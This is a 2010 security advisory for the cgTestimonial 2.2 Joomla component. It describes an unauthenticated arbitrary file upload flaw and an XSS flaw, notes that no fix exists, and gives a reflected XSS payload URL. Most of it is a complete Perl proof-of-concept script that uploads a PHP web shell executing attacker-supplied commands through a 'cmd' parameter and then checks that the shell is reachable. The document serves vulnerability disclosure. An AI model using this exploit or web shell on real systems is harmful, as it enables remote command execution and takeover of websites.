cgTestimonial 2.2 Joomla Component Multiple Remote Vulnerabilities Name: cgTestimonial Vendor: http://www.cmsgalaxy.com Versions Affected: 2.2 Author: Salvatore Fresta aka Drosophila Website: http://www.salvatorefresta.net Contact: salvatorefresta [at] gmail [dot] com Date: 2010-08-06 X. INDEX I. ABOUT THE APPLICATION II. DESCRIPTION III. ANALYSIS IV. SAMPLE CODE V. FIX I. ABOUT THE APPLICATION ________________________ The cg_Testimonial component is a tool for adding testimonials by the user from the frontend and for managing and publishing testimonials from the backend. This Joomla extension allows website users to submit a testimonials form with several fields on one of your site's pages and enables adding testimonials by either users or admin. II. DESCRIPTION _______________ Some parameters are not properly sanitised. The following vulnerabilities can be exploited by guest (unauthenticated) users. III. ANALYSIS _____________ Summary: A) Multiple Arbitrary File Upload B) XSS A) Multiple Arbitrary File Upload _________________________________ The usr_img parameter in cgtestimonial.php (frontend) and in testimonial.php (admin, without checks) is not properly sanitised. The only check performed is on the Content-Type HTTP field of the uploaded part. B) XSS ______ The url parameter in video.php is not properly sanitised before being printed on screen. IV. SAMPLE CODE _______________ A) Multiple Arbitrary File Upload http://poc.salvatorefresta.net/PoC-cgTestimonial2.2.pl.txt B) XSS http://site/path/components/com_cgtestimonial/video.php?url="><script>alert('xss');</script> V. FIX ______ No fix. ################################ PoC-cgTestimonial2.2.pl ################################ #!/usr/bin/perl # # PoC - Remote PHP Shell Upload - cgTestimonial 2.2 Joomla Component # # Author: Salvatore Fresta aka Drosophila # Email:salvatorefresta@gmail.com # # Date: 06 August 2010 # # http://target/path/components/com_cgtestimonial/user_images/filename?cmd=command # use IO::Socket; $usage = "\ncgTestimonial 2.2 Remote PHP Shell Upload - (c) Salvatore Fresta\n". 
"http://www.salvatorefresta.net\n\n". "Usage: perl PoC-cgTestimonial.pl <hostname> <path>\n\n"; $#ARGV == 1 || die $usage; my $host= $ARGV[0]; my $path= $ARGV[1]; my $stop= 0; my $rand= "master".int(rand 150); my $shell = "<?php echo \"<pre>\"; system(\$_GET['cmd']); echo \"</pre>\"; ?>"; my $filename= "evil.php"; my $code= "--AaB03x\r\n". "Content-Disposition: form-data; name=\"usr_img\"; filename=\"$filename\"\r\n". "Content-Type: image/jpeg\r\n". "\r\n". "$shell\r\n". "--AaB03x--"; my $pkg = "POST ".$path."index.php?option=com_cgtestimonial&task=submit HTTP/1.1\r\n". "Host: $host\r\n". "Content-Type: multipart/form-data; boundary=AaB03x\r\n". "Content-Length: " .length($code). "\r\n". "\r\n". $code; my $socket = new IO::Socket::INET( Proto=> "tcp", PeerAddr=> $host, PeerPort=> "80" ) or die "\n[-] Unable to connect to $host\n\n"; print "\n[+] Connected\n"; print $socket $pkg; $pkg = "GET ".$path."components/com_cgtestimonial/user_images/".$filename." HTTP/1.1\r\n". "Host: $host\r\n\r\n"; print $socket $pkg; while ((my $rec = <$socket>) && $stop != 1) { if($rec !=~ /302 Found/) { $stop = 1; } } if($stop != 1) { print "[-] Shell not uploaded\n"; close($socket); exit; } print "[+] Shell uploaded on ".$host.$path."components/com_cgtestimonial/user_images/".$filename."\n". "[+] Disconnected\n\n"; close($socket); |